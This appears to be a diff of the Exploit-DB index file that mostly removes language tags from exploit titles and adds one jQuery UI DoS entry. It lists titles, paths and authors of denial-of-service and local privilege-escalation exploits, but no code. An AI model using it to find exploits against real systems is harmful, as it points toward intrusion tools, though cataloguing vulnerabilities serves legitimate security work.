+365,exploits/windows/dos/365.html,"Microsoft Internet Explorer - Denial of Service",2004-07-23,Phuong,dos,windows,
 366,exploits/windows/dos/366.pl,"Microsoft Windows SMS 2.0 - Denial of Service",2004-07-24,MacDefender,dos,windows,
 370,exploits/linux/dos/370.c,"Citadel/UX - Remote Denial of Service (PoC)",2004-08-02,CoKi,dos,linux,
-371,exploits/linux/dos/371.c,"Apache - Arbitrary Long HTTP Headers Denial of Service (C)",2004-08-02,anonymous,dos,linux,
+371,exploits/linux/dos/371.c,"Apache - Arbitrary Long HTTP Headers Denial of Service",2004-08-02,anonymous,dos,linux,
 376,exploits/windows/dos/376.html,"Microsoft Internet Explorer - 'mshtml.dll' Remote Null Pointer Crash",2004-08-04,anonymous,dos,windows,
 383,exploits/multiple/dos/383.c,"psyBNC 2.3 - Denial of Service",2002-05-19,"Lunar Fault",dos,multiple,31337
 385,exploits/windows/dos/385.c,"Microsoft Messenger (Linux) - Denial of Service (MS03-043)",2004-08-08,VeNoMouS,dos,windows,
@@ -184,8 +184,8 @@ id,file,description,date,author,type,platform,port
 1027,exploits/windows/dos/1027.c,"FutureSoft TFTP Server 2000 - Remote Denial of Service",2005-06-02,ATmaCA,dos,windows,
 1037,exploits/multiple/dos/1037.c,"Tcpdump - bgp_update_print Remote Denial of Service",2005-06-09,simon,dos,multiple,
 1056,exploits/multiple/dos/1056.pl,"Apache 2.0.49 - Arbitrary Long HTTP Headers Denial of Service",2005-06-20,Qnix,dos,multiple,
-1063,exploits/php/dos/1063.pl,"phpBB 2.0.15 - Register Multiple Users (Denial of Service) (Perl)",2005-06-22,g30rg3_x,dos,php,
-1064,exploits/php/dos/1064.c,"phpBB 2.0.15 - Register Multiple Users (Denial of Service) (C)",2005-06-22,HaCkZaTaN,dos,php,
+1063,exploits/php/dos/1063.pl,"phpBB 2.0.15 - Register Multiple Users (Denial of Service)",2005-06-22,g30rg3_x,dos,php,
+1064,exploits/php/dos/1064.c,"phpBB 2.0.15 - Register Multiple Users (Denial of Service)",2005-06-22,HaCkZaTaN,dos,php,
 1065,exploits/windows/dos/1065.c,"Microsoft Windows - 'SMB' Transaction Response Handling (MS05-011)",2005-06-23,cybertronic,dos,windows,
 1067,exploits/windows/dos/1067.cpp,"TCP-IP Datalook 1.3 - Local Denial of Service",2005-06-25,basher13,dos,windows,
 1072,exploits/multiple/dos/1072.cpp,"Stream / Raped (Windows) - Denial of Service",2005-06-27,"Marco Del Percio",dos,multiple,
@@ -373,13 +373,13 @@ id,file,description,date,author,type,platform,port
 2057,exploits/windows/dos/2057.c,"Microsoft Windows - Mailslot Ring0 Memory Corruption (MS06-035)",2006-07-21,cocoruder,dos,windows,
 2059,exploits/hardware/dos/2059.cpp,"D-Link Devices - UPNP Stack Overflow Denial of Service (PoC)",2006-07-22,ub3rst4r,dos,hardware,
 2073,exploits/multiple/dos/2073.c,"libmikmod 3.2.2 - GT2 Loader Local Heap Overflow (PoC)",2006-07-25,"Luigi Auriemma",dos,multiple,
-2124,exploits/windows/dos/2124.php,"XChat 2.6.7 (Windows) - Remote Denial of Service (PHP)",2006-08-07,ratboy,dos,windows,
-2147,exploits/windows/dos/2147.pl,"XChat 2.6.7 (Windows) - Remote Denial of Service (Perl)",2006-08-08,Elo,dos,windows,
+2124,exploits/windows/dos/2124.php,"XChat 2.6.7 (Windows) - Remote Denial of Service",2006-08-07,ratboy,dos,windows,
+2147,exploits/windows/dos/2147.pl,"XChat 2.6.7 (Windows) - Remote Denial of Service",2006-08-08,Elo,dos,windows,
 2156,exploits/hardware/dos/2156.c,"PocketPC Mms Composer - 'WAPPush' Denial of Service",2006-08-09,"Collin Mulliner",dos,hardware,
 2160,exploits/windows/dos/2160.c,"OpenMPT 1.17.02.43 - Multiple Remote Buffer Overflows (PoC)",2006-08-10,"Luigi Auriemma",dos,windows,
 2176,exploits/hardware/dos/2176.html,"Nokia Symbian 60 3rd Edition - Browser Crash (Denial of Service)",2006-08-13,Qode,dos,hardware,
 2179,exploits/multiple/dos/2179.c,"Opera 9 - IRC Client Remote Denial of Service",2006-08-13,Preddy,dos,multiple,
-2180,exploits/multiple/dos/2180.py,"Opera 9 IRC Client - Remote Denial of Service (Python)",2006-08-13,Preddy,dos,multiple,
+2180,exploits/multiple/dos/2180.py,"Opera 9 IRC Client - Remote Denial of Service",2006-08-13,Preddy,dos,multiple,
 2194,exploits/windows/dos/2194.pl,"Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (1)",2006-08-16,Preddy,dos,windows,
 2195,exploits/windows/dos/2195.html,"VMware 5.5.1 - COM Object Arbitrary Partition Table Delete",2006-08-16,nop,dos,windows,
 2204,exploits/windows/dos/2204.c,"Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (3)",2006-08-17,Preddy,dos,windows,
@@ -399,7 +399,7 @@ id,file,description,date,author,type,platform,port
 2524,exploits/bsd/dos/2524.c,"FreeBSD 5.4/6.0 - 'ptrace PT_LWPINFO' Local Denial of Service",2006-10-12,kokanin,dos,bsd,
 2541,exploits/bsd/dos/2541.c,"FreeBSD 6.1-RELEASE-p10 - 'ftruncate' Local Denial of Service",2006-10-13,kokanin,dos,bsd,
 2542,exploits/bsd/dos/2542.c,"FreeBSD 6.1-RELEASE-p10 - 'scheduler' Local Denial of Service",2006-10-13,kokanin,dos,bsd,
-2571,exploits/windows/dos/2571.pl,"Xfire 1.6.4 - Remote Denial of Service (Perl)",2006-10-16,n00b,dos,windows,
+2571,exploits/windows/dos/2571.pl,"Xfire 1.6.4 - Remote Denial of Service",2006-10-16,n00b,dos,windows,
 2586,exploits/multiple/dos/2586.pl,"Clam AntiVirus 0.88.4 - CHM Chunk Name Length Denial of Service (PoC)",2006-10-17,"Damian Put",dos,multiple,
 2587,exploits/multiple/dos/2587.txt,"Clam AntiVirus 0.88.4 - 'rebuildpe' Remote Heap Overflow (PoC)",2006-10-17,"Damian Put",dos,multiple,
 2597,exploits/multiple/dos/2597.pl,"Asterisk 1.0.12/1.2.12.1 - 'chan_skinny' Remote Heap Overflow (PoC)",2006-10-19,"Noam Rathaus",dos,multiple,
@@ -408,7 +408,7 @@ id,file,description,date,author,type,platform,port
 2639,exploits/bsd/dos/2639.c,"FreeBSD 6.1 - '/dev/crypto' Local Kernel Denial of Service",2006-10-24,"Evgeny Legerov",dos,bsd,
 2650,exploits/windows/dos/2650.c,"RevilloC MailServer 1.x - 'RCPT TO' Remote Denial of Service",2006-10-25,"Greg Linares",dos,windows,
 2672,exploits/windows/dos/2672.py,"Microsoft Windows - NAT Helper Components 'ipnathlp.dll' Remote Denial of Service",2006-10-28,h07,dos,windows,
-2682,exploits/windows/dos/2682.pl,"Microsoft Windows - NAT Helper Components Remote Denial of Service (Perl)",2006-10-30,x82,dos,windows,
+2682,exploits/windows/dos/2682.pl,"Microsoft Windows - NAT Helper Components Remote Denial of Service",2006-10-30,x82,dos,windows,
 2695,exploits/multiple/dos/2695.html,"Mozilla Firefox 1.5.0.7/2.0 - 'createRange' Remote Denial of Service",2006-10-31,"Gotfault Security",dos,multiple,
 2700,exploits/hardware/dos/2700.rb,"Apple Airport - 802.11 Probe Response Kernel Memory Corruption (PoC) (Metasploit)",2006-11-01,"H D Moore",dos,hardware,
 2708,exploits/windows/dos/2708.c,"NullSoft Winamp 5.3 - Ultravox-Max-Msg Heap Overflow Denial of Service (PoC)",2006-11-03,cocoruder,dos,windows,
@@ -488,7 +488,7 @@ id,file,description,date,author,type,platform,port
 3182,exploits/windows/dos/3182.py,"Sami HTTP Server 2.0.1 - HTTP 404 Object not found Denial of Service",2007-01-23,shinnai,dos,windows,
 3190,exploits/windows/dos/3190.py,"Microsoft Windows Explorer - '.AVI' File Denial of Service",2007-01-24,shinnai,dos,windows,
 3193,exploits/windows/dos/3193.py,"Microsoft Excel - Malformed Palette Record Denial of Service (PoC) (MS07-002)",2007-01-25,LifeAsaGeek,dos,windows,
-3200,exploits/osx/dos/3200.rb,"Apple CFNetwork - HTTP Response Denial of Service (Ruby)",2007-01-25,MoAB,dos,osx,
+3200,exploits/osx/dos/3200.rb,"Apple CFNetwork - HTTP Response Denial of Service",2007-01-25,MoAB,dos,osx,
 3204,exploits/windows/dos/3204.c,"Citrix Metaframe Presentation Server Print Provider - Buffer Overflow (PoC)",2007-01-26,"Andres Tarasco",dos,windows,
 3223,exploits/cgi/dos/3223.pl,"CVSTrac 2.0.0 - Defacement Denial of Service",2007-01-29,"Ralf S. Engelschall",dos,cgi,
 3224,exploits/windows/dos/3224.c,"Intel 2200BG 802.11 - disassociation packet Kernel Memory Corruption",2007-01-29,"Breno Silva Pinto",dos,windows,
@@ -1281,7 +1281,7 @@ id,file,description,date,author,type,platform,port
 10223,exploits/windows/dos/10223.txt,"TYPSoft FTP Server 1.10 - APPE DELE Denial of Service",2009-11-24,leinakesi,dos,windows,21
 10229,exploits/multiple/dos/10229.txt,"Python < 2.5.2 Imageop Module - 'imageop.crop()' Buffer Overflow",2009-11-24,"Chris Evans",dos,multiple,
 10237,exploits/hardware/dos/10237.txt,"Allegro RomPager 2.10 - URL Request Denial of Service",2000-06-01,netsec,dos,hardware,80
-10242,exploits/php/dos/10242.txt,"PHP < 5.3.1 - 'MultiPart/form-data' Denial of Service (Python)",2009-11-27,Eren,dos,php,
+10242,exploits/php/dos/10242.txt,"PHP < 5.3.1 - 'MultiPart/form-data' Denial of Service",2009-11-27,Eren,dos,php,
 10243,exploits/php/dos/10243.txt,"PHP - MultiPart Form-Data Denial of Service (PoC)",2009-11-22,"Bogdan Calin",dos,php,
 10257,exploits/windows/dos/10257.py,"XM Easy Professional FTP Server 5.8.0 - Denial of Service",2009-11-30,"Mert SARICA",dos,windows,21
 10303,exploits/windows/dos/10303.py,"Core FTP Server 1.0 Build 319 - Denial of Service",2009-12-04,"Mert SARICA",dos,windows,
@@ -1755,7 +1755,7 @@ id,file,description,date,author,type,platform,port
 15248,exploits/windows/dos/15248.txt,"Winamp 5.5.8.2985 - Multiple Buffer Overflows",2010-10-13,"Luigi Auriemma",dos,windows,
 15250,exploits/windows/dos/15250.py,"Ease Jukebox 1.30 - Denial of Service",2010-10-14,Sweet,dos,windows,
 15263,exploits/windows/dos/15263.py,"ConvexSoft DJ Audio Mixer - Denial of Service",2010-10-16,"MOHAMED ABDI",dos,windows,
-15264,exploits/aix/dos/15264.py,"PHP Hosting Directory 2.0 - Database Disclosure (Python)",2010-10-16,ZoRLu,dos,aix,
+15264,exploits/aix/dos/15264.py,"PHP Hosting Directory 2.0 - Database Disclosure",2010-10-16,ZoRLu,dos,aix,
 15257,exploits/windows/dos/15257.py,"PCDJ Karaoki 0.6.3819 - Denial of Service",2010-10-15,"MOHAMED ABDI",dos,windows,
 15258,exploits/windows/dos/15258.py,"DJ Legend 6.01 - Denial of Service",2010-10-15,"MOHAMED ABDI",dos,windows,
 15259,exploits/windows/dos/15259.txt,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - Buffer Overflow",2010-10-15,"Luigi Auriemma",dos,windows,
@@ -2461,8 +2461,8 @@ id,file,description,date,author,type,platform,port
 20311,exploits/windows/dos/20311.c,"Avirt Mail 4.0/4.2 - 'Mail From:' / 'Rcpt to:' Denial of Service",2000-10-23,Martin,dos,windows,
 20323,exploits/hardware/dos/20323.txt,"Cisco IOS 12 - Software '?/' HTTP Request Denial of Service",2000-10-25,"Alberto Solino",dos,hardware,
 20328,exploits/hardware/dos/20328.txt,"Intel InBusiness eMail Station 1.4.87 - Denial of Service",2000-10-20,"Knud Erik Højgaard",dos,hardware,
-20331,exploits/hardware/dos/20331.c,"Ascend R 4.5 Ci12 - Denial of Service (C)",1998-03-16,Rootshell,dos,hardware,
-20332,exploits/hardware/dos/20332.pl,"Ascend R 4.5 Ci12 - Denial of Service (Perl)",1998-03-17,Rootshell,dos,hardware,
+20331,exploits/hardware/dos/20331.c,"Ascend R 4.5 Ci12 - Denial of Service",1998-03-16,Rootshell,dos,hardware,
+20332,exploits/hardware/dos/20332.pl,"Ascend R 4.5 Ci12 - Denial of Service",1998-03-17,Rootshell,dos,hardware,
 20336,exploits/multiple/dos/20336.txt,"Unify eWave ServletExec 3.0 c - Denial of Service",2000-10-30,"Foundstone Labs",dos,multiple,
 43153,exploits/windows/dos/43153.js,"Microsoft Edge Chakra: JIT - 'Lowerer::LowerBoundCheck' Incorrect Integer Overflow Check",2017-11-16,"Google Security Research",dos,windows,
 20373,exploits/hp-ux/dos/20373.txt,"HP-UX 9.x/10.x/11.x - cu Buffer Overflow",2000-11-02,zorgon,dos,hp-ux,
@@ -4369,7 +4369,7 @@ id,file,description,date,author,type,platform,port
 34521,exploits/linux/dos/34521.txt,"Oracle MySQL < 5.1.49 - Malformed 'BINLOG' Arguments Denial of Service",2010-08-20,"Shane Bester",dos,linux,
 34522,exploits/linux/dos/34522.txt,"Oracle MySQL < 5.1.49 - 'DDL' Statements Denial of Service",2010-07-09,"Elena Stepanova",dos,linux,
 34530,exploits/windows/dos/34530.py,"Crystal Player 1.98 - '.mls' Buffer Overflow",2010-08-20,"Praveen Darshanam",dos,windows,
-34540,exploits/windows/dos/34540.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH) (Python)",2014-09-05,"Robert Kugler",dos,windows,
+34540,exploits/windows/dos/34540.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH)",2014-09-05,"Robert Kugler",dos,windows,
 34588,exploits/aix/dos/34588.txt,"PHP Stock Management System 1.02 - Multiple Vulnerabilities",2014-09-09,jsass,dos,aix,
 34603,exploits/windows/dos/34603.py,"Adobe Acrobat and Reader 9.3.4 - 'acroform_PlugInMain' Memory Corruption",2010-09-06,ITSecTeam,dos,windows,
 34602,exploits/windows/dos/34602.html,"Microsoft Internet Explorer 7/8 - CSS Handling Cross Domain Information Disclosure",2010-09-06,"Chris Evans",dos,windows,
@@ -6767,6 +6767,7 @@ id,file,description,date,author,type,platform,port
 49207,exploits/windows/dos/49207.txt,"RarmaRadio 2.72.5 - Denial of Service (PoC)",2020-12-07,"Ismael Nava",dos,windows,
 49283,exploits/multiple/dos/49283.txt,"Nxlog Community Edition 2.10.2150 - DoS (Poc)",2020-12-17,"Guillaume PETIT",dos,multiple,
 49337,exploits/windows/dos/49337.py,"Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC)",2021-01-04,stresser,dos,windows,
+49489,exploits/multiple/dos/49489.html,"jQuery UI 1.12.1 - Denial of Service (DoS)",2021-01-28,"Rafael Cintra Lopes",dos,multiple,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -6806,7 +6807,7 @@ id,file,description,date,author,type,platform,port
 180,exploits/linux/local/180.c,"GnomeHack 1.0.5 - Local Buffer Overflow",2000-11-15,vade79,local,linux,
 182,exploits/linux/local/182.sh,"RedHat 6.2 - '/sbin/restore' Local Privilege Escalation",2000-11-16,anonymous,local,linux,
 183,exploits/linux/local/183.c,"Oracle (oidldapd connect) - Local Command Line Overflow",2000-11-16,anonymous,local,linux,
-184,exploits/linux/local/184.pl,"RedHat 6.2 Restore and Dump - Local Privilege Escalation (Perl)",2000-11-16,Tlabs,local,linux,
+184,exploits/linux/local/184.pl,"RedHat 6.2 Restore and Dump - Local Privilege Escalation",2000-11-16,Tlabs,local,linux,
 186,exploits/linux/local/186.pl,"xsplumber - 'strcpy()' Local Buffer Overflow",2000-11-17,vade79,local,linux,
 193,exploits/linux/local/193.sh,"dump 0.4b15 - Local Privilege Escalation",2000-11-19,mat,local,linux,
 197,exploits/solaris/local/197.c,"Solaris/SPARC 2.7 / 7 locale - Format String",2000-11-20,"Solar Eclipse",local,solaris,
@@ -6913,7 +6914,7 @@ id,file,description,date,author,type,platform,port
 629,exploits/multiple/local/629.c,"Multiple AntiVirus - '.zip' Detection Bypass",2004-11-14,oc192,local,multiple,
 657,exploits/linux/local/657.c,"atari800 - Local Privilege Escalation",2004-11-25,pi3,local,linux,
 669,exploits/linux/local/669.c,"Aspell (word-list-compress) - Command Line Stack Overflow",2004-12-01,c0d3r,local,linux,
-680,exploits/osx/local/680.txt,"Apple Mac OSX Adobe Version Cue - Local Privilege Escalation (Bash)",2004-12-08,"Jonathan Bringhurst",local,osx,
+680,exploits/osx/local/680.txt,"Apple Mac OSX Adobe Version Cue - Local Privilege Escalation",2004-12-08,"Jonathan Bringhurst",local,osx,
 684,exploits/linux/local/684.c,"TipxD 1.1.1 - Not SETUID Local Format String",2004-12-14,CoKi,local,linux,
 694,exploits/windows/local/694.c,"WinRAR 3.4.1 - Corrupt '.ZIP' File",2004-12-16,"Vafa Khoshaein",local,windows,
 695,exploits/linux/local/695.c,"Cscope 15.5 - Symlink",2004-12-17,Gangstuck,local,linux,
@@ -6941,7 +6942,7 @@ id,file,description,date,author,type,platform,port
 791,exploits/linux/local/791.c,"Setuid perl - 'PerlIO_Debug()' Local Overflow",2005-02-07,"Kevin Finisterre",local,linux,
 792,exploits/linux/local/792.c,"Setuid perl - 'PerlIO_Debug()' Root Owned File Creation Privilege Escalation",2005-02-07,"Kevin Finisterre",local,linux,
 793,exploits/osx/local/793.pl,"Apple Mac OSX - '.DS_Store' Arbitrary File Overwrite",2005-02-07,vade79,local,osx,
-795,exploits/osx/local/795.pl,"Apple Mac OSX Adobe Version Cue - Local Privilege Escalation (Perl)",2005-02-07,0xdeadbabe,local,osx,
+795,exploits/osx/local/795.pl,"Apple Mac OSX Adobe Version Cue - Local Privilege Escalation",2005-02-07,0xdeadbabe,local,osx,
 796,exploits/linux/local/796.sh,"Exim 4.42 - Local Privilege Escalation",2005-02-07,darkeagle,local,linux,
 798,exploits/windows/local/798.c,"DelphiTurk CodeBank 3.1 - Local Username and Password Disclosure",2005-02-08,Kozan,local,windows,
 803,exploits/windows/local/803.c,"DelphiTurk FTP 1.0 - Passwords to Local Users",2005-02-09,Kozan,local,windows,
@@ -6992,7 +6993,7 @@ id,file,description,date,author,type,platform,port
 971,exploits/windows/local/971.cpp,"BulletProof FTP Server 2.4.0.31 - Local Privilege Escalation",2005-04-29,"Jerome Athias",local,windows,
 972,exploits/solaris/local/972.c,"Solaris 10.x - ESRI Arcgis Format String Privilege Escalation",2005-04-30,"Kevin Finisterre",local,solaris,
 973,exploits/linux/local/973.c,"ARPUS/Ce - Local File Overwrite (setuid)",2005-05-01,"Kevin Finisterre",local,linux,
-974,exploits/linux/local/974.pl,"ARPUS/Ce - Local Overflow (setuid) (Perl)",2005-05-01,"Kevin Finisterre",local,linux,
+974,exploits/linux/local/974.pl,"ARPUS/Ce - Local Overflow (setuid)",2005-05-01,"Kevin Finisterre",local,linux,
 997,exploits/linux/local/997.sh,"cdrdao (Mandrake 10.2) - Local Privilege Escalation",2005-05-17,newbug,local,linux,
 1001,exploits/aix/local/1001.txt,"AIX 5.1 Bellmail - Local Race Condition",2005-05-19,watercloud,local,aix,
 1009,exploits/linux/local/1009.c,"Exim 4.41 - 'dns_build_reverse' Local Read Emails",2005-05-25,Plugger,local,linux,
@@ -7046,7 +7047,7 @@ id,file,description,date,author,type,platform,port
 1406,exploits/windows/local/1406.php,"PHP 4.4.0 - 'mysql_connect function' Local Buffer Overflow",2006-01-05,mercenary,local,windows,
 1407,exploits/windows/local/1407.c,"Microsoft Windows Server 2000 Kernel - APC Data-Free Local Escalation (MS05-055)",2006-01-05,SoBeIt,local,windows,
 1412,exploits/linux/local/1412.rb,"Xmame 0.102 - '-lang' Local Buffer Overflow",2006-01-10,xwings,local,linux,
-1415,exploits/linux/local/1415.c,"Xmame 0.102 - 'lang' Local Buffer Overflow (C)",2006-01-13,Qnix,local,linux,
+1415,exploits/linux/local/1415.c,"Xmame 0.102 - 'lang' Local Buffer Overflow",2006-01-13,Qnix,local,linux,
 1425,exploits/linux/local/1425.c,"Xmame 0.102 - '-pb/-lang/-rec' Local Buffer Overflow",2006-01-21,sj,local,linux,
 1445,exploits/linux/local/1445.c,"Eterm LibAST < 0.7 - '-X' Option Privilege Escalation",2006-01-24,"Johnny Mast",local,linux,
 1449,exploits/linux/local/1449.c,"SquirrelMail 3.1 - Change Passwd Plugin Local Buffer Overflow",2006-01-25,"rod hedor",local,linux,
@@ -7376,7 +7377,7 @@ id,file,description,date,author,type,platform,port
 7516,exploits/windows/local/7516.txt,"ESET Smart Security 3.0.672 - 'epfw.sys' Local Privilege Escalation",2008-12-18,"NT Internals",local,windows,
 7533,exploits/windows/local/7533.txt,"PowerStrip 3.84 - 'pstrip.sys' Local Privilege Escalation",2008-12-21,"NT Internals",local,windows,
 7536,exploits/windows/local/7536.cpp,"CoolPlayer 2.19 - '.Skin' Local Buffer Overflow",2008-12-21,r0ut3r,local,windows,
-7547,exploits/windows/local/7547.py,"CoolPlayer 2.19 - '.Skin' Local Buffer Overflow (Python)",2008-12-22,Encrypt3d.M!nd,local,windows,
+7547,exploits/windows/local/7547.py,"CoolPlayer 2.19 - '.Skin' Local Buffer Overflow",2008-12-22,Encrypt3d.M!nd,local,windows,
 7550,exploits/multiple/local/7550.c,"CUPS < 1.3.8-4 - Local Privilege Escalation",2008-12-22,"Jon Oberheide",local,multiple,
 7577,exploits/windows/local/7577.pl,"Acoustica Mixcraft 4.2 - Universal Stack Overflow (SEH)",2008-12-24,SkD,local,windows,
 7581,exploits/freebsd/local/7581.c,"FreeBSD 6x/7 - 'protosw' Local Privilege Escalation",2008-12-28,"Don Bailey",local,freebsd,
@@ -7408,8 +7409,8 @@ id,file,description,date,author,type,platform,port
 7745,exploits/windows/local/7745.py,"VUPlayer 2.49 - '.asx' Universal Local Buffer Overflow",2009-01-13,Encrypt3d.M!nd,local,windows,
 7765,exploits/windows/local/7765.py,"OtsTurntables 1.00.027 - '.ofl' Local Stack Overflow",2009-01-14,suN8Hclf,local,windows,
 7839,exploits/windows/local/7839.py,"Total Video Player 1.31 - 'DefaultSkin.ini' Local Stack Overflow",2009-01-20,His0k4,local,windows,
-7843,exploits/windows/local/7843.c,"Browser3D 3.5 - '.sfs' Local Stack Overflow (C)",2009-01-22,SimO-s0fT,local,windows,
-7848,exploits/windows/local/7848.pl,"Browser3D 3.5 - '.sfs' Local Stack Overflow (Perl)",2009-01-22,AlpHaNiX,local,windows,
+7843,exploits/windows/local/7843.c,"Browser3D 3.5 - '.sfs' Local Stack Overflow",2009-01-22,SimO-s0fT,local,windows,
+7848,exploits/windows/local/7848.pl,"Browser3D 3.5 - '.sfs' Local Stack Overflow",2009-01-22,AlpHaNiX,local,windows,
 7853,exploits/windows/local/7853.pl,"Elecard MPEG Player - '.m3u' Local Stack Overflow",2009-01-25,AlpHaNiX,local,windows,
 7855,exploits/linux/local/7855.txt,"PostgreSQL 8.2/8.3/8.4 - UDF for Command Execution",2009-01-25,"Bernardo Damele",local,linux,
 7856,exploits/linux/local/7856.txt,"MySQL 4/5/6 - UDF for Command Execution",2009-01-25,"Bernardo Damele",local,linux,
@@ -7519,7 +7520,7 @@ id,file,description,date,author,type,platform,port
 8657,exploits/windows/local/8657.txt,"EasyPHP 3.0 - Arbitrary Modify Configuration File",2009-05-11,Zigma,local,windows,
 8660,exploits/windows/local/8660.pl,"CastRipper 2.50.70 - '.m3u' Local Buffer Overflow",2009-05-12,[0]x80->[H]4x²0r,local,windows,
 8661,exploits/windows/local/8661.pl,"CastRipper 2.50.70 - '.m3u' Universal Stack Overflow",2009-05-12,Stack,local,windows,
-8662,exploits/windows/local/8662.py,"CastRipper 2.50.70 - '.m3u' Universal Stack Overflow (Python)",2009-05-12,"Super Cristal",local,windows,
+8662,exploits/windows/local/8662.py,"CastRipper 2.50.70 - '.m3u' Universal Stack Overflow",2009-05-12,"Super Cristal",local,windows,
 8663,exploits/windows/local/8663.pl,"CastRipper 2.50.70 - '.pls' Universal Stack Overflow",2009-05-12,zAx,local,windows,
 8670,exploits/windows/local/8670.php,"Pinnacle Studio 12 - '.hfz' Directory Traversal",2009-05-13,Nine:Situations:Group,local,windows,
 8673,exploits/linux/local/8673.c,"Linux Kernel 2.6.x (Gentoo 2.6.29rc1) - 'ptrace_attach' Local Privilege Escalation",2009-05-13,s0m3b0dy,local,linux,
@@ -7572,7 +7573,7 @@ id,file,description,date,author,type,platform,port
 9229,exploits/windows/local/9229.py,"WINMOD 1.4 - '.lst' Universal Buffer Overflow (SEH) (2)",2009-07-22,Dz_Girl,local,windows,
 9234,exploits/windows/local/9234.pl,"WINMOD 1.4 - '.lst' Local Stack Overflow",2009-07-23,"CWH Underground",local,windows,
 40297,exploits/windows/local/40297.py,"NScan 0.9.1 - 'Target' Local Buffer Overflow",2016-08-29,hyp3rlinx,local,windows,
-9272,exploits/windows/local/9272.py,"Adobe Acrobat 9.1.2 NOS - Local Privilege Escalation (Python)",2009-07-27,Dr_IDE,local,windows,
+9272,exploits/windows/local/9272.py,"Adobe Acrobat 9.1.2 NOS - Local Privilege Escalation",2009-07-27,Dr_IDE,local,windows,
 9286,exploits/windows/local/9286.pl,"MP3 Studio 1.0 - '.mpf' / '.m3u' Local Stack Overflow (SEH)",2009-07-28,corelanc0d3r,local,windows,
 9291,exploits/windows/local/9291.pl,"MP3 Studio 1.0 - '.mpf' Local Buffer Overflow (SEH)",2009-07-28,Koshi,local,windows,
 9298,exploits/windows/local/9298.pl,"Millenium MP3 Studio 1.0 - '.mpf' Local Stack Overflow (2)",2009-07-30,corelanc0d3r,local,windows,
@@ -7753,9 +7754,9 @@ id,file,description,date,author,type,platform,port
 10747,exploits/windows/local/10747.py,"Mini-stream Ripper (Windows XP SP2/SP3) - Local Overflow",2009-12-27,dijital1,local,windows,
 10748,exploits/windows/local/10748.rb,"Mini-stream 3.0.1.1 - Local Buffer Overflow (Metasploit)",2009-12-27,dijital1,local,windows,
 10759,exploits/windows/local/10759.pl,"M.J.M. Quick Player 1.2 - Local Stack Buffer Overflow",2009-12-28,corelanc0d3r,local,windows,
-10782,exploits/windows/local/10782.pl,"Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow (Perl)",2009-12-29,jacky,local,windows,
-10786,exploits/windows/local/10786.py,"Soritong 1.0 - Universal Buffer Overflow (Python)",2009-12-29,jacky,local,windows,
-10787,exploits/windows/local/10787.py,"Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow (Python)",2009-12-29,jacky,local,windows,
+10782,exploits/windows/local/10782.pl,"Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow",2009-12-29,jacky,local,windows,
+10786,exploits/windows/local/10786.py,"Soritong 1.0 - Universal Buffer Overflow",2009-12-29,jacky,local,windows,
+10787,exploits/windows/local/10787.py,"Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow",2009-12-29,jacky,local,windows,
 10797,exploits/windows/local/10797.py,"Quick Player 1.2 - Unicode Buffer Overflow (1)",2009-12-30,mr_me,local,windows,
 10827,exploits/windows/local/10827.rb,"DJ Studio Pro 5.1.6.5.2 - Local Overflow (SEH)",2009-12-30,"Sébastien Duquette",local,windows,
 10920,exploits/windows/local/10920.cpp,"VirtualDJ Trial 6.0.6 'New Year Edition' - '.m3u' Local Overflow",2010-01-02,"fl0 fl0w",local,windows,
@@ -9457,7 +9458,7 @@ id,file,description,date,author,type,platform,port
 27874,exploits/windows/local/27874.py,"Winamp 5.63 - 'winamp.ini' Local Overflow",2013-08-26,"Ayman Sagy",local,windows,
 27938,exploits/linux/local/27938.rb,"VMware - Setuid VMware-mount Unsafe popen(3) (Metasploit)",2013-08-29,Metasploit,local,linux,
 27944,exploits/osx/local/27944.rb,"Apple Mac OSX - Sudo Password Bypass (Metasploit)",2013-08-29,Metasploit,local,osx,
-27965,exploits/osx/local/27965.py,"Apple Mac OSX 10.8.4 - Local Privilege Escalation (Python)",2013-08-30,"David Kennedy (ReL1K)",local,osx,
+27965,exploits/osx/local/27965.py,"Apple Mac OSX 10.8.4 - Local Privilege Escalation",2013-08-30,"David Kennedy (ReL1K)",local,osx,
 28084,exploits/windows/local/28084.html,"KingView 6.53 - 'SuperGrid' Insecure ActiveX Control",2013-09-04,blake,local,windows,
 28130,exploits/windows/local/28130.rb,"IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) - Missing DLL (Metasploit)",2013-09-06,Metasploit,local,windows,
 28287,exploits/linux/local/28287.c,"Linux-HA Heartbeat 1.2.3/2.0.x - Insecure Default Permissions on Shared Memory",2006-07-27,anonymous,local,linux,
@@ -9725,7 +9726,7 @@ id,file,description,date,author,type,platform,port
 35395,exploits/windows/local/35395.txt,"CCH Wolters Kluwer PFX Engagement 7.1 - Local Privilege Escalation",2014-11-28,"Information Paradox",local,windows,
 35423,exploits/windows/local/35423.txt,"Thomson Reuters Fixed Assets CS 13.1.4 - Local Privilege Escalation",2014-12-02,"Information Paradox",local,windows,
 35440,exploits/osx/local/35440.rb,"Apple Mac OSX - IOKit Keyboard Driver Privilege Escalation (Metasploit)",2014-12-02,Metasploit,local,osx,
-35449,exploits/windows/local/35449.rb,"BulletProof FTP Client 2010 - Local Buffer Overflow (SEH) (Ruby)",2014-12-03,"Muhamad Fadzil Ramli",local,windows,
+35449,exploits/windows/local/35449.rb,"BulletProof FTP Client 2010 - Local Buffer Overflow (SEH)",2014-12-03,"Muhamad Fadzil Ramli",local,windows,
 35450,exploits/linux/local/35450.txt,"VFU 4.10-1.1 - Local Buffer Overflow",2014-12-03,"Juan Sacco",local,linux,
